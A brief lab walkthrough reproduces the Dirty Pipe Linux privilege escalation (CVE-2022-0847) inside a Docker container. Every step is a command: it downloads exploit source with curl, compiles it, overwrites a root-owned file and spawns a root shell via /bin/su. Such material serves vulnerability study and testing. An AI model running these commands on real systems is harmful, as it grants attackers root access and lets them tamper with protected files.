CVE-2022-0847: Linux - Write Anything Exploit

Setup environment

# Start a docker container, drop to shell.
docker run --rm -it ubuntu:focal-20220302 /bin/bash

# cd to /tmp, Install GCC / Curl and create a user "foo"
cd /tmp; apt update && apt install -y gcc curl && useradd -s /bin/bash foo

Variant 1: Write Anything

# create a file owned by root.
echo This is roots file dont touch it! > root_owns_this
chmod 644 root_owns_this

# drop to "foo" user.
su foo

# download the payload
curl -o write_anything.c https://dl.packetstormsecurity.net/2203-exploits/write_anything.c

# compile
gcc -o write_anything ./write_anything.c

# before
cat ./root_owns_this

# exploit
./write_anything ./root_owns_this 1 FOOOOO

# after
cat ./root_owns_this

Variant 2: Root Shell

# drop to "foo" user.
su foo

# download the payload
curl -o dirty.c https://dl.packetstormsecurity.net/2203-exploits/dirtypipez.c

# compile
gcc -o dirty ./dirty.c

# exploit
./dirty /bin/su